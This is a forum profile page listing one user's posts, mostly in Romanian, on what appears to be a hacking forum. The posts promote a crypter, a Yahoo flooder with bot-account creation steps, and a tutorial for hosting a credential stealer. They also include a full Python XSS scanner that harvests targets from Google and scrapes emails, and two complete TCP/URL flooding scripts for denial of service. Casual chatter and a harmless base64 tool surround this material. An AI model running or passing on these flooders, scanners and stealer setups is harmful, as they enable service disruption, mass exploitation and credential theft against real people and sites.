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Everything posted by Gabriel87

  1. Hi, New Father Crypter will be up in about one month. Current client gui: ht - Pastebin.com
  2. @1337 , ai idee ce botnet trebuie sa aiba sa pice tot ?) pff nu cred ca ajunge el sa faca o gramada de boti
  3. De dai de pe banda ta de net si nu ai banda pici tu mai repede decat victima:))
  4. http://www.4shared.com/file/ooWtw_kT/Yahoo_Flooder.html [+]Ca sa creati buti faceti in felul urmator : Intrati in arhiva IR IDMakerV3.2 Intrati in IR IDMaker . Cand ati intrat in el bifati : -Random Boot name -Randomize Name and Lastname -Randomize information Si apasati butonul start. Acum v-a aparut codul captcha in dreapta pe care va trebui sa il scrieti in stanga butonului Create..Dupa fiecaredata cand scrieti codul apasati pe Create.Si un boot se va creea. Dupa dati Save si veti putea salva buti creati unde vreti. Gasesti in folder si Idmarker
  5. Salut , bun venit !
  6. Nu s-a schimbat nimic parola merge la arhiva incearca sa o scri tu parola
  7. Poftim cine sufera ma baiatule tu ce ai zis ca nu e cu virusi si cu licenta si tu sari in sus pai bineinteles dupa ce ti-am stricat acuma treaba si numai poti face spread cu serveru asta postat de tine cum sa nu te oftici acuma si sa injuri ca un taran da stiu de pe unu de pe HF il ai si ala ti`o dat atunci server dar esti prea copil sa il verifici inainte sa il iei.
  8. Ratat ii spui la cine te`o crescut ma copilasule si nu sunt eu ala care l-am pupat in cur pe George pe HackWorld care nici nu stiu cine e mai si ala.. si daca eu is pe langa.. tu pe unde esti ? de nu esti in stare unde sa faci un amarat de spread cu serveru si vi aici cu vrajeli de 2 bani sa ne zici ca nu e fara virusi si e cu licenta tu crezi ca ori cine pune botu la de astia ca si tine. Edit : File Info Report date: 2011-08-03 14:00:45 (GMT 1) File name: istealer-6-3-legends-exe File size: 1712128 bytes MD5 Hash: b72399dc0e1977c9e5c90db26d044a18 SHA1 Hash: 3e6ef0c085fbca240bf8bb5526c7fe04ff014d36 Detection rate: 3 on 5 (60%) Status: INFECTED Detections AVG - PSW.Generic8.YN Avira AntiVir - ClamAV - Trojan.Spy-75681 Emsisoft - Trojan-PWS.Win32.Dybalom!IK TrendMicro - Scan report generated by NoVirusThanks.org File name : iStealer_63_Legends File type : EXE File size : 1.63 MB MD5 Hash : b72399dc0e1977c9e5c90db26d044a18 Detection rate : 3 / 22 (14 %) Result : INFECTED Detection : - Mozilla Firefox Stealer - Registry editor - File editor (maybe binded) Multumesc Crownsoft hai mai zi ceva acuma
  9. Si vrei sa te credem ca e fara virusi si este curat ?
  10. Da , si cand ti-se belesc botii iti faci alti
  11. Gabriel87


    ?Istealer - Tutorial & Download [HACKERSBAY]?? - YouTube Tutorial cum sa montezi un Stealer pe 000webhost sunt mai multe tutoriale
  12. Gabriel87

    Skype API

    Bravo , imi place:) poti face si pentru Yahoo messenger asa ceva ?
  13. Ma tu vezi de cand e postul? nu se mai face nimic
  14. Frumos tutorialul felicitari
  15. Ms , ai +1 rep
  16. Si pe tine cine te`o invatat sa scanezi pe Virustotal ? scaneaza frate pe novirusthanks cu " Do not distribute the sample " bifata
  17. http://www.youtube.com/watch?v=rVngT0MZNec
  18. Clar.. server de rat si merge la adresa subseven90.no-ip.org
  19. Ti-am trimis si eu PM cu e-mailul multumesc .
  20. #!/usr/bin/python import sys, urllib2, re, sets, random, httplib, time, socket def title(): print "nt d3hydr8[at]gmail[dot]com XSS Scanner v1.3" print "t-----------------------------------------------" def usage(): title() print "n Usage: python XSSscan.py <option>n" print "n Example: python XSSscan.py -g inurl:'.gov' 200 -a 'XSS h4ck3d' -write xxs_found.txt -vn" print "t[options]" print "t -g/-google <query> <num of hosts> : Searches google for hosts" print "t -s/-site <website> <port>: Searches just that site, (default port 80)" print "t -a/-alert <alert message> : Change the alert pop-up message" print "t -w/-write <file> : Writes potential XSS found to file" print "t -v/-verbose : Verbose Moden" def StripTags(text): finished = 0 while not finished: finished = 1 start = text.find("<") if start >= 0: stop = text[start:].find(">") if stop >= 0: text = text[:start] + text[start+stop+1:] finished = 0 return text def timer(): now = time.localtime(time.time()) return time.asctime(now) def geturls(query): counter = 10 urls = [] while counter < int(sys.argv[3]): url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N' opener = urllib2.build_opener(url) opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')] data = opener.open(url).read() hosts = re.findall(('w+.[w.-/]*.w+'),StripTags(data)) #Lets add sites found to a list if not already or a google site. #We don't want to upset the people that got our list for us. for x in hosts: if x.find('www') != -1: x = x[x.find('www'):] if x not in urls and re.search("google", x) == None: urls.append(x) counter += 10 return urls def getemails(site): try: if site.split("/",1)[0] not in done: print "t[+] Collecting Emails:",site.split("/",1)[0] webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read() emails = re.findall('[w.-]+@[w.-]+.www', webpage) done.append(site.split("/",1)[0]) if emails: return emails except(KeyboardInterrupt): print "n[-] Cancelled -",timer(),"n" sys.exit(1) except(IndexError): pass def getvar(site): names = [] actions = [] print "n","-"*45 print "[+] Searching:",site try: webpage = urllib2.urlopen(proto+"://"+site, port).read() emails = re.findall('[w.-]+@[w.-]+.www', webpage) var = re.findall("?[w.-/]*=",webpage) if len(var) >=1: var = list(sets.Set(var)) found_action = re.findall("action="[w.-/]*"", webpage.lower()) found_action = list(sets.Set(found_action)) if len(found_action) >= 1: for a in found_action: a = a.split('"',2)[1] try: if a[0] != "/": a = "/"+a except(IndexError): pass actions.append(a) found_names = re.findall("name="[w.-/]*"", webpage.lower()) found_names = list(sets.Set(found_names)) for n in found_names: names.append(n.split('"',2)[1]) print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names) print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*len(xss_payloads) if len(var) >= 1: for v in var: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+"/"+v+xss) for xss in xss_payloads: tester(site+"/"+v+xss) if len(names) >= 1: for n in names: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss) for xss in xss_payloads: tester(site+"/"+"?"+n+"="+xss) if len(actions) != 0 and len(names) >= 1: for a in actions: for n in names: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss) #tester(site.split("/")[0]+a+"?"+n+"="+xss) if len(actions) != 0 and len(var) >= 1: for a in actions: for v in var: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+a+v+xss) else: for xss in xss_payloads: tester(site.split("/")[0]+a+v+xss) if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": urls.remove(site) except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror): if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": urls.remove(site) pass except(KeyboardInterrupt): print "n[-] Cancelled -",timer(),"n" sys.exit(1) def tester(target): if verbose ==1: if message != "": print "Target:",target.replace(alert ,message) else: print "Target:",target try: source = urllib2.urlopen(proto+"://"+target, port).read() h = httplib.HTTPConnection(target.split('/')[0], int(port)) try: h.request("GET", "/"+target.split('/',1)[1]) except(IndexError): h.request("GET", "/") r1 = h.getresponse() if verbose ==1: print "t[+] Response:",r1.status, r1.reason if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418): if target not in found_xss: if message != "": print "n[!] XSS:", target.replace(alert ,message) else: print "n[!] XSS:", target print "t[+] Response:",r1.status, r1.reason emails = getemails(target) if emails: print "t[+] Email:",len(emails),"addressesn" found_xss.setdefault(target, list(sets.Set(emails))) else: found_xss[target] = "None" except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL): pass except(KeyboardInterrupt): print "n[-] Cancelled -",timer(),"n" sys.exit(1) except(): pass if len(sys.argv) <= 2: usage() sys.exit(1) for arg in sys.argv[1:]: if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1 if arg.lower() == "-w" or arg.lower() == "-write": txt = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-a" or arg.lower() == "-alert": message = re.sub("s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2]) title() socket.setdefaulttimeout(10) found_xss = {} done = [] count = 0 proto = "http" alert = "D3HYDR8%2D0wNz%2DY0U" print "n[+] XSS_scan Loaded" try: if verbose ==1: print "[+] Verbose Mode On" except(NameError): verbose = 0 print "[-] Verbose Mode Off" try: if message: print "[+] Alert:",message except(NameError): print "[+] Alert:",alert message = "" pass xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E", "%22%3E<IMG SRC="javascript:alert(%27"+alert+"%27);">", "%22%3E<script>alert(String.fromCharCode(68,51,72,89,68,82,56,45,48,119,78,122,45,89,48,85));</script>", "'';!--"<%27"+alert+"%27>=&{()}", "';alert(0)//';alert(1)//%22;alert(2)//%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function", "</textarea><script>alert(%27"+alert+"%27)</script>"] try: if txt: print "[+] File:",txt except(NameError): txt = None pass print "[+] XSS Payloads:",len(xss_payloads) if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": try: if sys.argv[3].isdigit() == False: print "n[-] Argument [",sys.argv[3],"] must be a number.n" sys.exit(1) else: if int(sys.argv[3]) <= 10: print "n[-] Argument [",sys.argv[3],"] must be greater than 10.n" sys.exit(1) except(IndexError): print "n[-] Need number of hosts to collect.n" sys.exit(1) query = re.sub("s","+",sys.argv[2]) port = "80" print "[+] Query:",query print "[+] Querying Google..." urls = geturls(query) print "[+] Collected:",len(urls),"hosts" print "[+] Started:",timer() print "n[-] Cancel: Press Ctrl-C" time.sleep(3) while len(urls) > 0: print "-"*45 print "n[-] Length:",len(urls),"remain" getvar(random.choice(urls)) if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site": site = sys.argv[2] try: if sys.argv[3].isdigit() == False: port = "80" else: port = sys.argv[3] except(IndexError): port = "80" print "[+] Site:",site print "[+] Port:",port if site[:7] == "http://": site = site.replace("http://","") if site[:8] == "https://": proto = "https" if port == "80": print "[!] Using port 80 with https? (443)" site = site.replace("https://","") print "[+] Started:",timer() print "n[-] Cancel: Press Ctrl-C" time.sleep(4) getvar(site) print "-"*65 print "nn[+] Potential XSS found:",len(found_xss),"n" time.sleep(3) if txt != None and len(found_xss) >=1: xss_file = open(txt, "a") xss_file.writelines("ntd3hydr8[at]gmail[dot]com XSS Scanner v1.3n") xss_file.writelines("t------------------------------------------nn") print "[+] Writing Data:",txt else: print "[-] No data written to disk" for k in found_xss.keys(): count+=1 if txt != None: if message != "": xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"n") else: xss_file.writelines("["+str(count)+"] "+k+"n") if message != "": print "n["+str(count)+"]",k.replace(alert ,message) else: print "n["+str(count)+"]",k addrs = found_xss[k] if addrs != "None": print "t[+] Email addresses:" for addr in addrs: if txt != None: xss_file.writelines("tEmail: "+addr+"n") print "t -",addr print "n[-] Done -",timer(),"n" Sursa : r00tsecurity
  21. #!/usr/bin/env python #Name: portblock.py #Author: s3my0n #Email: RuSH4ck3R[at]gmail[dot]com from socket import * import sys def Main(ADDR, MAXRESP): try: server = socket(AF_INET, SOCK_STREAM) server.bind(ADDR) server.listen(5) # 5 is maximum connection at a time except BaseException, e: print '\n [-]%s' % e sys.exit() notdone = True count = 0 #will increase by one on response while notdone: try: print '\n[+]Wating for connection' client, caddr = server.accept() print '\n Connection from: ', caddr client.send('\n\aAccess Denied on port: %d\n' % (port)) #beep xD client.close() count += 1 if count == MAXRESP: break #if you close the server here, you will get an error except KeyboardInterrupt: print '\n [-]Aborted' #will only exit when data has been recieved sys.exit() except BaseException, e: print '\n [-]%s' % e sys.exit(1) server.close() sys.exit() if __name__=='__main__': if len(sys.argv) not in [3, 4]: print '\n\t#############' print '\t# By s3my0n #' print '\t#############' print '\n\tUsage: portblock.py [host IP] [port] [maximum responses]' print '\t portblock.py [port] [maximum responses]' print '\n\tDefault host IP address is localhost' sys.exit() if len(sys.argv) == 4: host = sys.argv[1] #user host IP address (p, m) = (2, 3) #just a workaround (hack ;-]) else: host = '' #default host IP address (p, m) = (1, 2) try: port = int(sys.argv[p]) #port number maxresp = int(sys.argv[m]) #maximum responses except ValueError: print '\n [-]Number needed for port and max responses' sys.exit() if port not in range(1, 65536): print '\n [-]Invalid port number' sys.exit() addr = (host, port) #address for binding Main(addr, maxresp) # initializing the server
  22. #!/usr/bin/env python #Name: b64.py #Author: s3my0n from base64 import b64decode from base64 import b64encode import sys def Decode(enc_string): try: dec_string = b64decode(enc_string) except TypeError: print '\nTypeError: not a valid base64 hash' sys.exit(1) return dec_string def Encode(string): enc_string = b64encode(string) return enc_string if __name__ == '__main__': opts = ('-de', '-en') if (len(sys.argv) != 3) or (sys.argv[1] not in opts): print '\nBase64 encoder/decoder' print 'Coded by RuSH4ck3R aka s3my0n' print '\nUsage: b64.py [-de, -en] [hash, string]' print '\nExample: b64.py -en mypassword' print ' b64.py -de bXlwYXNzd29yZA==' sys.exit() if sys.argv[1] == opts[0]: print '%s' % (Decode(sys.argv[2])) if sys.argv[1] == opts[1]: print '%s' % (Encode(sys.argv[2]))
  23. URL flooder: #!/usr/bin/env python ''' Simple flooder to flood URL's Uses TCP sockets and urllib Author: chroniccommand ''' from socket import * import urllib2, sys, random if len(sys.argv) != 3: print("Usage: %s <url> <port>" % sys.argv[0]) else: s = socket(AF_INET, SOCK_STREAM) host = sys.argv[1] port = int(sys.argv[2]) sockhost1 = host.strip('http://') sockhost = gethostbyname(sockhost1) longsht = random._urandom(1024) fmsg = "Fuxed by Poison team" print sockhost i = 1 s.connect((sockhost,port)) while(1): urllib2.urlopen(host) s.send(longsht * 200) s.send(fmsg) print("Fuxed x%d" % i) i += 1 IP flooder: ''' Simple flooder to flood IP's Uses TCP sockets Author: Chroniccommand ''' from socket import * import sys, random if len(sys.argv) != 4: print("Usage: %s <host> <port> <bytes>" % sys.argv[0]) print("Bytes is how many random bytes to send") else: s = socket(AF_INET, SOCK_STREAM) host = sys.argv[1] port = int(sys.argv[2]) fmsg = "Fuxed by Poison team" longsht = random._urandom(int(sys.argv[3])) i = 1 s.connect((host, port)) while(1): s.send(longsht * 200) s.send(fmsg) print("Fuxed x%d" % i) i += 1
  24. Noscript Addblock Noscript Flagfox Cookie manager
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